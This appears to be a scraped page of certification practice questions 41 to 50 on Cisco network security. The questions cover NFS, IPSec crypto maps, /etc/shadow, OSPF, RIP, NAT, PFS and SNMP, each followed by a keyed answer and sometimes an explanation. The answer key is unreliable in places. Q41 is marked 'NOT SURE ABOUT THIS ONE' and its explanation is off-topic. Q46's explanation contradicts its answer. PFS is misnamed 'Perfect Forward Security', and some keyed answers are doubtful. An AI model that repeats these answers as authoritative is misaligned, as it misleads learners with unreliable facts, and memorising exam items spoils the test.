|
QUESTION 41 Why would you advice the new Cisco Highway trainee technician NOT to use NFS protocol for use across a firewall or a security domain?
A. The security of the protocol is not stringent because File permissions can easily be modified in the requests.
B. Industry technicians do not understand NFS well, but is actually appropriate to run across various security domains.
C. NFS is not secure because it does not have the concept of users and permissions.
D. It is UDP based which makes its state difficult to track.
E. This protocol uses a range of ports, and firewalls have difficulty opening the proper entry points to allow traffic. Answer: A Explanation: NOT SURE ABOUT THIS ONE Another use of RPC is with the following command to see the exports of 204.31.17.25 if you want to allow NFS mounting from outside in. Note RPC is a very nonsecure protocol and should be used with caution. Type Application layer file transfer protocol. Port 2049 (TCP, UDP).
QUESTION 42 Exhibit: Which of the following crypto maps and access list commands should be used to permit the IPSec to handle multiple peers from Router A?
A. crypto map foo 10 ipsec-isakmp set peer B set peer C match address 101 set trans bar access-list 101 permit ip 20.1.1.0 0.0.0.255 30.1.1.0 0.0.0.255 access-list 101 permit ip 20.1.1.0 0.0.0.255 40.1.1.0 0.0.0.255
B. crypto map foo 10 ipsec-isakmp set peer B match address 101 set trans bar crypto map foo 20 ipsect-isakmp set per C match address 101 set trans bar access-list 101 permit ip 20.1.1.0 0.0.0.255 30.1.1.0 0.0.0.255 access-list 101 permit ip 20.1.1.0 0.0.0.255 40.1.1.0 0.0.0.255
C. crypto map foo 10 ipsec-isakmp set peer B match address 101 set trans bar crypto map foo 20 ipsec-isakmp set peer C match address 102 set trans bar access-list 101 permit ip 20.1.1.0 0.0.255 30.1.1.0 0.0.0.255 access-list 102 permit ip 20.1.1.0 0.0.255 40.1.1.0 0.0.0.255
D. crypto map foo 10 ipsec-isakmp set peer B match address 101 set trans bar crypto trans bar crypto map foo 20 ipsec-isakmp set peer C match address 102 set trans bar access-list 101 permit ip 20.1.1.0 0.0.0.255 any access-list 102 permit ip 20.1.1.0 0.0.0.255 any
E. crypto map foo 10 ipsec-isakmp set peer B match address 101 set trans bar crypto map foo 10 ipsec-isakmp set peer C match address 102 set trans bar access-list 101 permit ip 20.1.1.0 0.0.0.255 any access-list 102 permit ip 20.1.1.0 0.0.0.255 any Answer: C
QUESTION 43 Which of the following aptly describes the Unix file /etc/shadow?
A. The Unix file/etc/shadow is referenced by login when the /etc/passwd file contains an asterisk in the third field.
B. The Unix file/etc/shadow is referenced by NIS when the /etc/passwd file contains a line with the first character of '+'.
C. The Unix file/etc/shadow is a place to store encrypted passwords without referencing the /etc/passwd file.
D. The Unix file/etc/shadow is a read-protected file referenced by login when the /etc/passwd file contains a special character in the second field. Answer: C Explanation: One of these is the shadow password scheme, which is used by default. The encrypted password is not kept in /etc/passwd, but rather in /etc/shadow. /etc/passwd has a placeholder, x, in this field. passwd is readable by everyone, whereas shadow is readable only by root. The shadow file also contains password aging controls. * or !! in the password field of /etc/shadow indicates that the account is disabled.
QUESTION 44 Exhibit: In a reorganization, OSPF areas are realigned. What changes will you advice the Cisco Highway trainee technician to make to the network and/or router configurations to render this a valid network design? (Choose all that apply.)
A. The trainee should configure Router B as an Area Border Router between Area 60 and area 6.
B. The trainee should configure a virtual link between Area 60 and Area 0.
C. The trainee should install a serial line or other physical connection between devices in Area 60 and Area 0.
D. This design is not a valid, and no changes can make it work. Answer: B, C
QUESTION 45 You are the Cisco Highway network administrator. Two remote LANs connected via a serial connection are exchanging routing updates via RIP. An alternate path exists with a higher hop count. When the serial link fails, you receive complaints of users regarding the time it takes to transfer to the alternate path. How will you ameliorate this situation?
A. You could change the hop count on an alternate path to be the same cost.
B. You could reduce or disable the hold down timer by making use of the timers basic command.
C. You could increase the bandwidth of the alternate serial connection.
D. You could configure a static route with the appropriate administrative cost via the alternate route. Answer: B
QUESTION 46 Under which of the following circumstances will Network Address Translation (NAT) not work well?
A. With outbound HTTP when AAA authentication is involved.
B. With traffic that carries source and/or destination IP addresses in the application data stream.
C. With ESP Tunnel mode IPSec traffic.
D. When PAT (Port Address Translation) is used on the same firewall.
E. When used in conjunction with static IP addresses assignment to some devices. Answer: B Explanation: AH does not work with NAT
QUESTION 47 Inside addresses = 131.108.0.0 Outside global addresses = 198.108.10.0 Serial 0 is connected to the outside world Which of the following Network Address Translation (NAT) configuration is correct when you consider the above information?
A. ip nat pool CCIE-198 198.108.10.0 198.108.10.255 prefex-length 24. ip nat inside source list 1 pol CCIE-198 interface serial 0 ip address 131.108.1.1 255.255.255.0 ip nat outside interface Ethernet0 ip address 198.108.10.1 255.255.255.0 ip nat inside access-list 1 permit 131.108.0.0 0.0.255.255
B. ip nat pool CCIE-198 198.108.10.0 198.108.10.255 prefix-length 24 ip nat inside source list 1 pool CCIE-198 interface serial 0 ip address 198.108.10.1 255.255.255.0 ip nat outside interface Ethernet0 ip address 131.108.1.1 255.255.255.0 ip nat inside access-list 1 permit 131.108.0 0.0.255.255
C. ip nat pool CCIE-198 198.108.10.0 198.108.10.255 prefix-length 24. ip nat inside source list 1 pool CCIE-198 interface serial 0 ip address 198.108.10.1 255.255.255.0 ip nat outside interface Ethernet0 ip address 131.108.1.1 255.255.255.0 ip nat inside access-list 1 permit 198.108.10.0 0.0.0.255
D. ip nat pool CCIE-131 131.108.1.0 131.108.1.255 prefix-length 24. ip nat inside source list 1 pool CCIE-131 interface serial 0 ip address 198.108.10.1 255.255.255.0 ip nat inside interface Ethernet0 ip address 131.108.1.1 255.255.255.0 ip nat outside access-list 1 permit 198.108.10.0 0.0.0.255 Answer: B Explanation:
ip nat inside source list 1 pool CCIE-198 calls access list 1 to state which IP address are to be nated
QUESTION 48 The newly appointed Cisco Highway trainee technician wants to know what PFS (Perfect Forward Security) requires. What will your reply be?
A. AH
B. ESP
C. Another Diffie-Hellman exchange when an SA has expired
D. Triple DES
E. A discrete client
F. All of the above Answer: C Explanation: crypto map my map 10 set pfs group2. This example specifies that PFS should be used whenever a new security association is negotiated for the crypto map "mymap 10." The 1024-bit Diffie-Hellman prime modulus group will be used when a new security association is negotiated using the Diffie-Hellman exchange.
QUESTION 49 Which of the following services would you advice the new Cisco Highway trainee technician to enable on ISO firewall devices?
A. SNMP with community string public.
B. TCP small services.
C. UDP small services.
D. Password-encryption.
E. CDP
F. All of the above. Answer: D Explanation: To encrypt passwords, use the SERVICE password-encryption global configuration command The answer of TCP small-services and UDP are TCP and UDP small-servers
QUESTION 50 Which of the following statements regarding SNMP v1 community strings is valid?
A. SNMP v1 community strings are encrypted across the wire.
B. SNMP v1 community strings can be used to gain unauthorized access into a device if the read-write string is known.
C. SNMP v1 community strings are always the same for reading & writing data.
D. SNMP v1 community strings are used to define the community of devices in a single VLAN. Answer: B Explanation: SNMP is also capable changing the configurations on the host, allowing the remote management of the network device.
Search and Find Anything Here
|
|
